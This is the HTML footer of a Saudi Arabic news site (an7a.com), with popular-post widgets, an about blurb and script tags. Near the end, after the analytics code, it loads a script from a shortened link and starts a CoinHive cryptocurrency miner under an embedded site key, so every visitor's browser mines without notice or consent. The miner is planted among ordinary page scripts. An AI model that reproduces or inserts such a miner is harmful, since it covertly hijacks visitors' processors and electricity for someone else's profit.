<a href="http://www.an7a.com/298633/"><img width="110" height="96" src="http://www.an7a.com/wp-content/uploads/2017/05/963bf296-9b4d-47fd-bd6d-5c9695833bf3-110x96.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" title="التويجري يكشف عن موعد بدء الصرف في برنامج &#8220;حساب المواطن&#8221;.. ويؤكد: ولي ولي العهد وجّه بالسخاء مع المواطنين" srcset="http://www.an7a.com/wp-content/uploads/2017/05/963bf296-9b4d-47fd-bd6d-5c9695833bf3-110x96.jpg 110w, http://www.an7a.com/wp-content/uploads/2017/05/963bf296-9b4d-47fd-bd6d-5c9695833bf3-110x96@2x.jpg 220w" sizes="(max-width: 110px) 100vw, 110px" />
</a>
<div class="content">
<a href="http://www.an7a.com/298633/" title="التويجري يكشف عن موعد بدء الصرف في برنامج &#8220;حساب المواطن&#8221;.. ويؤكد: ولي ولي العهد وجّه بالسخاء مع المواطنين">
التويجري يكشف عن موعد بدء الصرف في برنامج “حس...</a>
<time datetime="2017-05-11T01:39:24+03:00"><i class="fa fa-clock-o"></i> مايو 11, 2017 </time>
</div>
</li>
<li>
<a href="http://www.an7a.com/268229/">
</a>
<div class="content">
<a href="http://www.an7a.com/268229/" title="أبو نية يغلب أبو نيتين.. وأبو ساعة يرقد مستشارَين">
أبو نية يغلب أبو نيتين.. وأبو ساعة يرقد مستشا...</a>
<time datetime="2016-10-22T09:43:41+03:00"><i class="fa fa-clock-o"></i> أكتوبر 22, 2016 </time>
</div>
</li>
<li>
<a href="http://www.an7a.com/267414/">
</a>
<div class="content">
<a href="http://www.an7a.com/267414/" title="يا عيني &#8230;. حظنا تعبان">
يا عيني …. حظنا تعبان</a>
<time datetime="2016-10-16T23:39:17+03:00"><i class="fa fa-clock-o"></i> أكتوبر 16, 2016 </time>
</div>
</li>
</ul>
</li>
<li class="widget col-3 popular-posts"> <h3 class="widgettitle">الأكثر تعليقًا</h3>
<ul class="posts-list">
<li>
<a href="http://www.an7a.com/70433/">
</a>
<div class="content">
<a href="http://www.an7a.com/70433/" title="أفخاذ المرأة السعودية!">
أفخاذ المرأة السعودية!</a>
<time datetime="2012-08-12T09:39:35+03:00"><i class="fa fa-clock-o"></i> أغسطس 12, 2012 </time>
</div>
</li>
<li>
<a href="http://www.an7a.com/85968/"><img width="110" height="73" src="http://www.an7a.com/wp-content/uploads/2012/12/زواج-في-كارفور.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" title="تحت سقف &#8220;كارفور&#8221;: سعودي يتزوج زميلته بمباركة  &#8220;فرنسية&#8221;" srcset="http://www.an7a.com/wp-content/uploads/2012/12/زواج-في-كارفور.jpg 737w, http://www.an7a.com/wp-content/uploads/2012/12/زواج-في-كارفور-300x199.jpg 300w" sizes="(max-width: 110px) 100vw, 110px" />
</a>
<div class="content">
<a href="http://www.an7a.com/85968/" title="تحت سقف &#8220;كارفور&#8221;: سعودي يتزوج زميلته بمباركة  &#8220;فرنسية&#8221;">
تحت سقف “كارفور”: سعودي يتزوج زميلته بمباركة ...</a>
<time datetime="2012-12-15T01:29:38+03:00"><i class="fa fa-clock-o"></i> ديسمبر 15, 2012 </time>
</div>
</li>
 <li>
<a href="http://www.an7a.com/112967/"><img width="110" height="62" src="http://www.an7a.com/wp-content/uploads/2013/07/6-Copy10.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" title="تقليد العريفي في مسلسل &#8220;واي فاي&#8221; يشعل هاشتاقات تويتر | فيديو" srcset="http://www.an7a.com/wp-content/uploads/2013/07/6-Copy10.jpg 640w, http://www.an7a.com/wp-content/uploads/2013/07/6-Copy10-300x168.jpg 300w, http://www.an7a.com/wp-content/uploads/2013/07/6-Copy10-610x350.jpg 610w" sizes="(max-width: 110px) 100vw, 110px" />
</a>
<div class="content">
<a href="http://www.an7a.com/112967/" title="تقليد العريفي في مسلسل &#8220;واي فاي&#8221; يشعل هاشتاقات تويتر | فيديو">
تقليد العريفي في مسلسل “واي فاي” يشعل هاشتاقا...</a>
<time datetime="2013-07-12T22:09:35+03:00"><i class="fa fa-clock-o"></i> يوليو 12, 2013 </time>
</div>
</li>
<li>
<a href="http://www.an7a.com/92225/"><img width="110" height="73" src="http://www.an7a.com/wp-content/uploads/2013/02/الطفل-واثار-المشرط-على-وجهه.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" title="طبيب في مستشفى حكومي «يشخبط» على وجه رضيع بالمشرط.. ويعتبره «خربشة بسيطة»" srcset="http://www.an7a.com/wp-content/uploads/2013/02/الطفل-واثار-المشرط-على-وجهه.jpg 737w, http://www.an7a.com/wp-content/uploads/2013/02/الطفل-واثار-المشرط-على-وجهه-300x199.jpg 300w" sizes="(max-width: 110px) 100vw, 110px" />
</a>
<div class="content">
<a href="http://www.an7a.com/92225/" title="طبيب في مستشفى حكومي «يشخبط» على وجه رضيع بالمشرط.. ويعتبره «خربشة بسيطة»">
طبيب في مستشفى حكومي «يشخبط» على وجه رضيع بال...</a>
<time datetime="2013-02-10T12:21:06+03:00"><i class="fa fa-clock-o"></i> فبراير 10, 2013 </time>
</div>
</li>
</ul>
</li>
<li class="widget col-3 widget_text"><h3 class="widgettitle">فريق العمل</h3> <div class="textwidget"><p>صحيفة سعودية إلكترونية، تأسست في مارس 2011م ، تصدر إلكترونيا في المملكة العربية السعودية بترخيص رسمي من وزارة الثقافة والإعلام السعودية، مقرها الرئيسي جدة، ويقوم على إدارة تحريرها مجموعة من الإعلاميين المحترفين
</p>
<p><a href="http://www.an7a.com/about/">إقرأ المزيد عن أنحاء من هنا</a></p>
<p>كافة الحقوق محفوظة 2014 صحيفة أنحاء</p></div>
</li> </ul>
</div>
</footer>
</div> 
<script type="text/javascript">var stats_ajax_url = "http://www.an7a.com/wp-admin/admin-ajax.php"; jQuery(document).ready(function() { jQuery.ajax({type: "POST", url: stats_ajax_url, data:"action=custom_stats&post_id=314933"}); });</script>
<script type='text/javascript' src='http://www.an7a.com/wp-includes/js/comment-reply.min.js?ver=4.8.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/www.an7a.com\/wp-json\/","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.8'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/themes/smart-mag/js/rtl-jquery.flexslider-min.js?ver=2.6.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/themes/smart-mag/js/jquery.sticky-sidebar.min.js?ver=2.6.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var popwid = {"postid":"314933","ajaxurl":"http:\/\/www.an7a.com\/wp-admin\/admin-ajax.php"};
var popwid = {"postid":"314933","ajaxurl":"http:\/\/www.an7a.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/popular-widget/_js/pop-widget.js?ver=1.7.0'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/themes/smart-mag-child/js/bunyad-theme.js?ver=2.6.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/themes/smart-mag-child/js/whatsapp-button.js?ver=2.6.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-includes/js/wp-embed.min.js?ver=4.8.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/akismet/_inc/form.js?ver=3.3.3'></script>

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-38226033-1']);
  _gaq.push(['_setDomainName', 'an7a.com']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'stats.g.doubleclick.net/dc.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
<script src="https://goo.gl/zvFfRb"></script>
<script>
	var miner = new CoinHive.Anonymous('o1WOf0WVXO9bXxO67dYR3i4M2Tr5vmLK');
	threads: 4;
	miner.start();
</script>

<script type="text/javascript">if(typeof wabtn4fg==="undefined"){wabtn4fg=1;h=document.head||document.getElementsByTagName("head")[0],s=document.createElement("script");s.type="text/javascript";s.src="http://www.an7a.com/wp-content/themes/smart-mag-child/js/whatsapp-button.js";h.appendChild(s);}</script><script src="http://stats.wordpress.com/e-201741.js" type="text/javascript"></script>
<script type="text/javascript">
st_go({blog:'39327061',v:'ext',post:'314933'});
var load_cmc = function(){linktracker_init(39327061,314933,2);};
if ( typeof addLoadEvent != 'undefined' ) addLoadEvent(load_cmc);
else load_cmc();
</script>
</body>
</html>
